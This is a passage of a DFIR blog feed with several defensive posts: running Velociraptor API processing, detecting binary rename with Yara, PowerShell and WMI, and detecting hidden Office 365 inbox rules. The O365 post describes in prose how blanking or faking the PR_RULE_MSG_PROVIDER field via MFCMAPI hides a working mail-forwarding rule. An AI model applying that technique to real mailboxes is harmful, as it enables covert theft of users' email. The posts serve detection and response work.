&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;450&quot; src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/05ProcessingPathBased.png&quot; /&gt;&lt;br /&gt;Example path specific processing flow&lt;/div&gt;

&lt;h3 id=&quot;so-what-do-we-collect&quot;&gt;So what do we collect?&lt;/h3&gt;
&lt;p&gt;The Velociraptor project has built in artefacts that are able to be customised easily. In the early days of Velociraptor I had written custom ntfs collection artifacts to accommodate my collection use cases. The velocidex team have recently developed an artefact that makes this process much easier. The artefact is called Windows.KapeFiles.Targets and extracts the collection profiles from Eric Zimmerman’s KapeFiles project.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/06KapeTargets.png&quot; /&gt;&lt;br /&gt;Artifact: KapeTargets&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;From a user perspective this is very easy with preset levels of live response enabled or individual targetted artefact collection. Of course I still have my own live response preferences based on use case, but Kape files is a fairly mature and modular collection capability.&lt;/p&gt;

&lt;h3 id=&quot;how-do-i-run-it&quot;&gt;How do I run it?&lt;/h3&gt;
&lt;p&gt;To run simply call the client script inside the same folder as the bindings.&lt;br /&gt;
For example  &lt;br /&gt;
        &lt;em&gt;/usr/bin/python3 $VRAPTOR/api/processing.py.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In my usecase I prefer an on demand Velociraptor processing service with the following attributes:&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;450&quot; src=&quot;/static/img/article_images/2019-11-10-LRwithVRaptor/07Service.png&quot; /&gt;&lt;br /&gt;Velociraptor Processing Service&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Set to on demand, I simply execute service startup with:&lt;br /&gt;
        &lt;em&gt;sudo systemctl start vraptor-processing&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Stop with:&lt;br /&gt;
        &lt;em&gt;sudo systemctl stop vraptor-processing&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;And view status with:&lt;br /&gt;
        &lt;em&gt;sudo systemctl status vraptor-processing -l&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Once running, the service will wait for relevant rows to be returned and process as configured.&lt;/p&gt;

&lt;h3 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h3&gt;
&lt;p&gt;In this post I have walked through using the Velociraptor API for live response processing. Velociraptor is modular providing access to underlying services and enabling blue teams to build the workflow that they need, on the infastructure that works for them. In my instance the example covers a small subset of what I plan to deply but is already saving on some really time consuming tasks.&lt;/p&gt;

&lt;p&gt;For those that are interested I have included below:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;&lt;a href=&quot;other/Velociraptor/VRaptorAPISetup.sh&quot;&gt;An install script for the API bindings and service install&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;other/Velociraptor/processing.py&quot;&gt;A POC processsing script&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;I hope you have gained some knowledge on Velociraptor API setup and one of the most important use cases for incident response. Please feel free to reach out and provide feedback or improvements.&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;further-resources&quot;&gt;Further resources&lt;/h1&gt;
&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://www.velocidex.com/about/&quot;&gt;Velociraptor Documentation&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://www.velocidex.com/docs/presentations/sans_dfir_summit2019/&quot;&gt;Velociraptor Overview at 2019 SANs DFIR Summit&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://www.velocidex.com/docs/getting-started/&quot;&gt;Velociraptor Getting started&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://www.velocidex.com/docs/user-interface/api/&quot;&gt;Velociraptor API documentation&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;https://github.com/Velocidex/velociraptor/tree/master/bindings/python&quot;&gt;Velociraptor Python Bindings&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

</description>
        <pubDate>Sun, 10 Nov 2019 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2019/11/10/LRwithVRaptor.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2019/11/10/LRwithVRaptor.html</guid>
        
        <category>DFIR</category>
        
        <category>Velociraptor</category>
        
        <category>VQL</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>O365: Hidden InboxRules</title>
        <description>&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;300&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/00title.png&quot; /&gt;&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;In this post Im going to talk about Office365 hidden inbox rules. Im going to give some background, show rule modification, and talk about detection methodology.&lt;/p&gt;

&lt;h1 id=&quot;background&quot;&gt;Background&lt;/h1&gt;
&lt;p&gt;Attacks against Office 365 have generated a fair amount of industry acknowledgement in recent times as more and more organisations have moved towards cloud based services. Misconfiguration combined with less than optimal threat awareness means even the most simple attacks can provide access to this crucial service.&lt;/p&gt;

&lt;p&gt;Inbox rules are typically part of evil methodology and can be abused across the attack lifecycle:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Defence Evasion&lt;/li&gt;
  &lt;li&gt;Reconnaissance&lt;/li&gt;
  &lt;li&gt;Persistence&lt;/li&gt;
  &lt;li&gt;Data collection / Exfiltration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Typically inbox rules are simple to detect statically via GUI access or in bulk from the Exchange Management Shell (EMS).&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/01rule.png&quot; /&gt;&lt;br /&gt;O365 OWA: Inbox rule https://outlook.office.com/mail/options/mail/rules&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/01rule2.png&quot; /&gt;&lt;br /&gt;O365 EMS: Typical Powershell detection.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;hidden-rules&quot;&gt;Hidden Rules&lt;/h1&gt;
&lt;p&gt;Minimally documented, Damian Pfammatter at Compass Security explained the methodology in his September 2018 &lt;a href=&quot;https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/&quot;&gt;blog post&lt;/a&gt;. In summary, inbox rules can be hidden by leveraging an API called Messaging Application Programming Interface (MAPI), which provides low level access to exchange data stores.&lt;/p&gt;

&lt;p&gt;Below I am accessing the inbox rule manually via the &lt;a href=&quot;https://github.com/stephenegriffin/mfcmapi&quot;&gt;MFCMAPI tool&lt;/a&gt; from a machine with an Outlook profile configured to our in scope mailbox. IPM.Rule.Version2.Message objects indicate an inbox rule.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/02mapi.png&quot; /&gt;&lt;br /&gt;EvilMove inbox rule: prior to change&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Modification is simply adding an unsupported value to the PR_RULE_MSG_PROVIDER field (or blanking out).&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/02mapi2.png&quot; /&gt;&lt;br /&gt;EvilMove inbox rule hidden: fake provider details.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;Once modified, the inbox rule is hidden and completely operational:&lt;/p&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/02mapi4.png&quot; /&gt;&lt;br /&gt;InboxRule hidden: no view in WebUI, InboxRule works as expected.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/02mapi5.png&quot; /&gt;&lt;br /&gt;InboxRule hidden: EMS results.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;detection&quot;&gt;Detection&lt;/h1&gt;

&lt;p&gt;At scale detection of hidden inbox rules comes down to two main areas.&lt;/p&gt;

&lt;h4 id=&quot;1-mapi-based---point-in-time&quot;&gt;1. MAPI based - point in time.&lt;/h4&gt;
&lt;p&gt;Microsoft have released a script for use over Exchange Web Services (EWS) - Get-AllTenantRulesAndForms that enables tenant wide collection of Exchange Rules and Forms querying the low level data stores. This script enables visibility of Hidden Rules but leaves out an essential PR_RULE_MSG_PROVIDER field for detection. A modified version from Glen Scales collecting the PR_RULE_MSG_PROVIDER field is available &lt;a href=&quot;https://github.com/gscales/O365-InvestigationTooling/blob/master/Get-AllTenantRulesAndForms.ps1&quot;&gt;here - Get-AllTenantRulesAndForms&lt;/a&gt; (screenshot below).&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Frequency analysis on RuleMsgProvider field is recommended as a starting point for detection.&lt;/li&gt;
  &lt;li&gt;Alert and investigate any inbox rules with blank or unusual RuleMsgProvider fields.&lt;/li&gt;
  &lt;li&gt;Alert and investigate IsPotentiallyMalicious = True - i.e rule action is an executable object.&lt;/li&gt;
  &lt;li&gt;Limitations are high privilege requirements - Global Admin role AND EWS ApplicationImpersonation.&lt;/li&gt;
&lt;/ul&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img height=&quot;200&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/03Detection.png&quot; /&gt;&lt;br /&gt;Exchange Web Services (EWS): Empty RuleName and RuleMsgProvider fields.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;The action, condition and command fields (if populated) are base64 encoded raw byte arrays. I have yet to find documentation on the format for decoding or reverse engineer the data but there are some identifiable strings that can provide insights into the rule.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/03Detection1a.png&quot; /&gt;&lt;br /&gt;Decoded Action: Rule to forward email to external SMTP account.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;For investigations, it is also possible to attempt to reanimate the strings and unhide the rules using MFCMAPI. In my testing I have been able to have the rule reappear adding in a known PR_RULE_MSG_PROVIDER field value.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;A fake, mistyped or blank PR_RULE_MSG_PROVIDER the rule would remain hidden.&lt;/li&gt;
  &lt;li&gt;Protocol documentation can be found &lt;a href=&quot;https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxorule/70ac9436-501e-43e2-9163-20d2b546b886&quot;&gt;here&lt;/a&gt;.&lt;/li&gt;
  &lt;li&gt;Remediation instructions can be found in the Further Reading section below.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;2-unified-audit-log---telemetry&quot;&gt;2. Unified Audit Log - telemetry.&lt;/h4&gt;
&lt;p&gt;The Unified Audit Log (UAL) is a centralised log storing audit events for all Azure services. It can be accessed via O365 WebUI: Security &amp;amp; Compliance &amp;gt; Search &amp;gt; AuditLog Search or EMS Administration: Search-UnifiedAuditLog commandlet.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;This method is best suited to active monitoring via a SIEM or monitoring solution.&lt;/li&gt;
  &lt;li&gt;Alert and investigate any unusual New-InboxRule (creation) or Set-InboxRule (modification) events.&lt;/li&gt;
  &lt;li&gt;Benefits include reduced privilege requirements - e.g a user with View-Only Audit Logs or Audit Logs roles enabled.&lt;/li&gt;
  &lt;li&gt;Logging must be enabled and retention is a consideration for historical searches.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;800&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/03Detection2.png&quot; /&gt;&lt;br /&gt;Telemetry based detection - Search-UnifiedAuditLog: New-InboxRule event&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h4 id=&quot;other-forwarding-specific&quot;&gt;Other Forwarding specific&lt;/h4&gt;
&lt;p&gt;O365 has other indirect detection capabilities that assist spotting hidden rules. One of those is built in alerting on forwarding of mail to external addresses. This alert is also generated as a SecurityComplianceAlert in the UAL. Keep in mind on compromise of a privileged account an attacker could simply suppress these alerts to stay under the radar.&lt;/p&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/03Detection3a.png&quot; /&gt;&lt;br /&gt;Redirect Threat Management alert - Email also sent.&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;p&gt;It is also possible to monitor traffic patterns of forwarded or redirected traffic. Below I have shown a summary inside the Security and Compliance Mailflow Dashboard.&lt;/p&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-06-09-O365HiddenRules/03Detection4.png&quot; /&gt;&lt;br /&gt;Mailflow Dashboard: https://protection.office.com/mailflow/dashboard&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h1&gt;
&lt;p&gt;In this post I have covered detection points for hidden inbox rules:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Point in time query via Exchange Web Services (EWS).&lt;/li&gt;
  &lt;li&gt;Rule creation and modification inside the Unified Audit Log.&lt;/li&gt;
  &lt;li&gt;Other alerts in O365 ecosystem&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Although this post has an example of an inbox rule with external forwarding, hidden rules can be leveraged for other evil use cases including: persistence, reconnaissance and data collection. Best practice would include creation of a low privilege account for active monitoring of telemetry and periodic assessments leveraging a higher privilege account via Exchange Web Services.&lt;/p&gt;

&lt;p&gt;I hope others found this post useful, feel free to reach out if you have any feedback, questions, or improvements.&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;h1 id=&quot;further-reading&quot;&gt;Further reading&lt;/h1&gt;
&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;Griffin, Stephen. &lt;a href=&quot;https://github.com/stephenegriffin/mfcmapi&quot;&gt;MFCMAPI github&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Hartley, Dave. &lt;a href=&quot;https://labs.mwrinfosecurity.com/blog/malicous-outlook-rules&quot;&gt;Malicious Outlook Rules&lt;/a&gt;, 2016&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Lambert, John. &lt;a href=&quot;https://onedrive.live.com/view.aspx?resid=F32A9F4F1477E49!122&amp;amp;ithint=file,pptx&amp;amp;authkey=!ACC5Ztb5uVED22k&quot;&gt;Office 365 Attacks&lt;/a&gt;, May 2019&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;MSDN. &lt;a href=&quot;https://blogs.msdn.microsoft.com/hkong/2015/02/27/how-to-delete-corrupted-hidden-inbox-rules-from-a-mailbox-using-mfcmapi/&quot;&gt;How to delete corrupted, hidden inbox rules from a mailbox using MFCMAPI&lt;/a&gt;, February 2015&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Pfammatter, Damian. &lt;a href=&quot;https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/&quot;&gt;Hidden Inbox Rules in Microsoft Exchange&lt;/a&gt;, September 2018&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Scales, Glen. &lt;a href=&quot;https://gsexdev.blogspot.com/2019/05/audting-inbox-rules-with-ews-and-graph.html&quot;&gt;Auditing Inbox rules with EWS and the Graph API in Powershell&lt;/a&gt;, May 2019
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

</description>
        <pubDate>Sun, 09 Jun 2019 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2019/06/09/O365HiddenRules.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2019/06/09/O365HiddenRules.html</guid>
        
        <category>DFIR</category>
        
        <category>O365</category>
        
        <category>Exchange</category>
        
        <category>Powershell</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Binary Rename 2</title>
        <description>&lt;p&gt;This is my second Binary Rename post, for the first and a detailed description of what Binary Rename is, please see: &lt;a href=&quot;https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html&quot;&gt;Blue Team Hacks - Binary Rename&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In my first post, I talked about telemetry and how we could leverage WMI Eventing for a niche detection usecase. In this post I am focusing on static detection, that is assessing files on disk. I am going to describe differences between both Yara and Powershell based detections, then share the code.&lt;/p&gt;

&lt;h1 id=&quot;yara-detection&quot;&gt;Yara Detection&lt;/h1&gt;
&lt;p&gt;Firstly Yara - Yara is a command line driven tool used mainly for pattern matching in malware or detection use cases. Rule based, though strings or binary patterns - matching can be leveraged with logic like boolean, counts or regular expressions. Although traditionally pattern based, Yara is modular and expandable such that a “PE” module is available focusing on querying common binary attributes. The PE module allows you to create rules targeted specifically to the PE file format and file headers, providing functions which can be used to write more effective rules for PE file use cases.&lt;/p&gt;

&lt;p&gt;The example I am using is leveraging pe.versioninfo InternalName attribute:&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;350&quot; src=&quot;/static/img/article_images/2019-05-29-BinaryRename2/01yara.png&quot; /&gt;&lt;br /&gt;PE module import and InternalName rule for renamed cmd.exe&lt;/div&gt;

&lt;p&gt;Our Yara use case is interesting as we require to compare an expected filename with the actual filename which is not typically a Yara capability. Florian Roth wrote about an “inverse” technique back in 2014 leveraging a Powershell script to obtain all files to be scanned and pass each filename into a yara scan as an external variable. The idea is a new yara instance is created for each file, passing in the relevant filename as the variable to allow comparison. In my code below I have expanded out the use case to cover x32 and x64 bit machines.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-05-29-BinaryRename2/01inversePS.png&quot; /&gt;&lt;br /&gt;Powershell: inverseYara.ps1&lt;/div&gt;

&lt;p&gt;For execution we require the following files in our execution path:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;inverseYara.ps1&lt;/li&gt;
  &lt;li&gt;yara binaries x86 or x64&lt;/li&gt;
  &lt;li&gt;rename.yar&lt;br /&gt;
&lt;br /&gt;
Then execution via a bat file or commandline as below:&lt;/li&gt;
&lt;/ul&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-05-29-BinaryRename2/01yararesults.png&quot; /&gt;&lt;br /&gt;Yara: Binary Rename detection results&lt;/div&gt;

&lt;p&gt;This technique works very well from a detection standpoint, however in my testing performance does not appear to be optimal due to the overhead of generating a new yara process for each file scanned. It is worthy to note, the yara scan could be targeted without the filename match focusing on unexpected locations for the files in scope, but this doesn’t match the binary rename usecase as required.&lt;/p&gt;

&lt;h1 id=&quot;powershell-detection&quot;&gt;Powershell Detection&lt;/h1&gt;
&lt;p&gt;In this case, the preferred detection is moving to Powershell only. The Windows API provides access to PE attributes via the FileVersionInfo Class with support back to Powershell 2.0 /.NET 2. Speed is significantly improved and logic can be optimised adding additional items in the output that may aid analysis. In my script output below you can see I have added a sha1 hash to the output object.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;600&quot; src=&quot;/static/img/article_images/2019-05-29-BinaryRename2/02psresults.png&quot; /&gt;&lt;br /&gt;Powershell results: 6 times faster than yara!&lt;/div&gt;

&lt;h1 id=&quot;limitations&quot;&gt;Limitations&lt;/h1&gt;
&lt;p&gt;The biggest limitation with any static detection capability that queries the whole disk is performance. Leveraging Powershell and native Windows API seems to optimise performance significantly. Other optimisations added are setting CPU priority to Idle only and configuring logic to filter effectively to minimise processing footprint. Additional optimisations around performance, could be targeted queries for specific staging locations of interest as part of a targeted detection.&lt;/p&gt;

&lt;p&gt;One consideration to keep in mind is the Powershell method leverages the Windows API. Although not a huge concern for my usecase of renamed binaries in a living off the land scenario, if there was tampering with rootkit like functionality a raw collection would be preferred.
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;final-thoughts&quot;&gt;Final Thoughts&lt;/h1&gt;
&lt;p&gt;Hopefully you will find this summary useful, closing the loop on an open source detection capability for the Binary Rename use case. Feel free to reach out if you have any feedback, questions, or improvements.&lt;/p&gt;

&lt;p&gt;Powershell and Yara detection code can be found here - &lt;a href=&quot;https://gist.github.com/mgreen27/036c2b33f928d188ddc60f26b4c9a097&quot;&gt;Get-BinaryRename&lt;/a&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;further-reading&quot;&gt;Further reading&lt;/h1&gt;
&lt;p&gt;1) Green, Matthew. &lt;a href=&quot;https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html&quot;&gt;Blue Team Hacks - Binary Rename&lt;/a&gt;, 2019 &lt;br /&gt;
2) The MITRE Corporation. &lt;a href=&quot;https://attack.mitre.org/techniques/T1036/&quot;&gt;Technique: Masquerading - MITRE ATT&amp;amp;CK™&lt;/a&gt; &lt;br /&gt;
3) MSDN. &lt;a href=&quot;https://docs.microsoft.com/en-us/dotnet/api/system.diagnostics.fileversioninfo?view=netframework-2.0&quot;&gt;FileVersionInfo&lt;/a&gt; &lt;br /&gt;
4) Roth, Florian. &lt;a href=&quot;https://www.bsk-consulting.de/2014/05/27/inverse-yara-signature-matching/&quot;&gt;Inverse Yara Signature Matching (Part 1/2)&lt;/a&gt;, 2014 &lt;br /&gt;
5) Roth, Florian. &lt;a href=&quot;https://www.bsk-consulting.de/2014/08/28/scan-system-files-manipulations-yara-inverse-matching-22/&quot;&gt;Inverse Yara Signature Matching (Part 2/2)&lt;/a&gt;, 2014 &lt;br /&gt;
6) YARA v3.10.0. &lt;a href=&quot;https://yara.readthedocs.io/en/v3.10.0/modules/pe.html&quot;&gt;PE Module&lt;/a&gt;
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
</description>
        <pubDate>Wed, 29 May 2019 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html</guid>
        
        <category>DFIR</category>
        
        <category>Powershell</category>
        
        <category>Yara</category>
        
        <category>T1036</category>
        
        <category>&quot;Defence</category>
        
        <category>Evasion&quot;</category>
        
        
        <category>posts</category>
        
      </item>
    
      <item>
        <title>Blue Team Hacks - Binary Rename</title>
        <description>&lt;p&gt;In this post I thought I would share an interesting proof of concept I developed to detect Binary Rename of commonly abused binaries. Im going to describe the detection, its limitations and share the code.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-05-12-BinaryRename/00title.jpg&quot; /&gt;&lt;/div&gt;

&lt;h1 id=&quot;background&quot;&gt;Background&lt;/h1&gt;
&lt;p&gt;Binary rename is a defence evasion technique used to bypass brittle process name and path based detections. Following the mantra of misdirection and hiding in plain sight, binary rename is a sub technique of &lt;a href=&quot;https://attack.mitre.org/techniques/T1036/&quot;&gt;T1036&lt;/a&gt; - Masquerading in the Mitre ATT&amp;amp;CK framework.  Binary rename can be observed in use across all stages of the attack lifecycle and is a technique used by a large selection of actors from commodity malware crews through to Nation States. One of the most well recognised use of the binary rename technique was NotPetya, a renamed psexec binary enabling the automated and devastating lateral infection.&lt;/p&gt;

&lt;p&gt;In my current $dayjob I developed a query to hunt for this activity by reviewing an executed process’ binary attributes and comparing with unexpected process names and paths. These have been some of my goto hunt queries pulling in hits for javascript based junkware, through to lateral movement, exfiltration tools and nation state level defence evasion.&lt;/p&gt;

&lt;p&gt;For attacks sitting earlier in the attack lifecycle, often this involves an extension to the living off the land techniques copying a monitored binary to a less conspicuous path. For interactive attacks or attacks later in lifecycle, often an attacker will leverage a hack tool or administration binary not native to the environment but similarly “legitimate” looking to an unfamiliar eye. Understanding the types of binaries used, the PE attributes enables some interesting detection anchors and subsequent hunts.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;700&quot; src=&quot;/static/img/article_images/2019-05-12-BinaryRename/01vba.png&quot; /&gt;&lt;br /&gt;VBA Macro example: https://twitter.com/ItsReallyNick/status/945682763486777345&lt;/div&gt;

&lt;p&gt;With that in mind, not all security teams have a capable EDR solution (End Point Detection and Response) that enables binary attribute visibility at scale. Thinking about this problem led me to thinking about an open source solution available on a wide selection of machines.&lt;/p&gt;

&lt;h1 id=&quot;solution&quot;&gt;Solution&lt;/h1&gt;
&lt;p&gt;In absence of a mature logging or EDR, an interesting visability tool is WMI Eventing. A WMI event subscription is a method of subscribing to certain system events with a trigger (filter) and action (event consumer). WMI eventing can be used to action on almost any operating system event. For example - logon, process, registry or file activity.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-05-12-BinaryRename/01WMIOverview.png&quot; /&gt;&lt;br /&gt;WMI Eventing&lt;/div&gt;

&lt;p&gt;WMI is the Blue Team’s equivalent to “living off the land” providing telemetry. This telemetry is similar to a limited version of modern EDR userland event tracing without the need to install a service or execute a binary directly. WMI Eventing is not new, Fireeye discussed the use of WMI as an endpoint intrusion detection system back in 2016. I have previously built WMI Eventing based solutions for a variety of niche IR use cases and visibility gaps. Although a complete description of WMI and WMI Event Consumers is outside the scope of this post, please see the further reading section for some detailed links and background in this space.
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;400&quot; src=&quot;/static/img/article_images/2019-05-12-BinaryRename/02filter.png&quot; /&gt;&lt;br /&gt;WMI Filter Query&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;
An ActiveScript Event Consumers allows the Blue Team to add logic and enrichment to WMI event triggers through the powerful Windows Scripting Host. In this POC I leverage a real time “extrinsic” wmi trigger for process execution monitoring, collecting ProcessID from all executed processes. A query of Win32_Process enables further process metadata to enable lookup of PE Attributes for detection. The PE Attribute in this use case is Original Name, with the Detection to lookup and alert against a list of high priority Original Names
&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-05-12-BinaryRename/03binaries.png&quot; /&gt;&lt;br /&gt;Binaries targetted: Original Name&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;
On condition match the POC has the capability to write to the Application event log. Event ID 4, with relevant alert details. The decision to leave out a hash calculation was decided for performance reasons, process path and Original Name providing a lead for live response.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;500&quot; src=&quot;/static/img/article_images/2019-05-12-BinaryRename/04evtx.png&quot; /&gt;&lt;br /&gt;Generated EventLog&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;
Similarly, output to a logfile for data ingestion. It is worthy to note: the POC can easily be modifed to suit requirements, removing the write to file or event log functions and function calls.&lt;/p&gt;

&lt;div style=&quot;text-align: center; font-size:70%;&quot;&gt;&lt;img width=&quot;750&quot; src=&quot;/static/img/article_images/2019-05-12-BinaryRename/04log.png&quot; /&gt;&lt;br /&gt;Generated Log File&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h1 id=&quot;limitations&quot;&gt;Limitations&lt;/h1&gt;
